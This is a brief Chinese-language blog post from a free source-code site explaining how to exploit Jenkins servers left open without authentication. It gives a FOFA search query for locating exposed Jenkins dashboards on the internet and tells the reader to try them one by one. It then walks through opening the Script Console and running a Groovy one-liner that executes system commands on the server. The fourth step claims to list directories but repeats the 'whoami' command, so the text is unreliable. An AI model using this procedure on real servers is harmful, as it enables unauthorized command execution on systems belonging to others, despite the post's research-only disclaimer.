【Jenkins未授权访问漏洞】

20 阅读 0 评论 0 点赞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务，通过脚本执行界面从而获取服务器权限。

第一步：使用fofa语句搜索

搜索语句：

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

一个一个搜索，直到出现 Manage Jenkins，在打开的URL中...点击 Manage Jenkins
Scritp Console 再执行以下命令.

第二步：点进去后，页面往下翻看到Scritp Console——点击。

、

第三步：执行命令，查看当前用户名

println "whoami".execute().text

如下图就是执行中

第四步：执行命令，查看目录

println "whoami".execute().text

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » 【Jenkins未授权访问漏洞】

点赞(0) 打赏

本文分类：文章资讯
本文标签：【Jenkins未授权访问漏洞】
浏览次数：20 次浏览
本文链接：https://freeymw.com/article/20973.html

评论列表共有 0 条评论

暂无评论

发表评论取消回复

微信公众账号

微信扫一扫加关注

发表
评论返回
顶部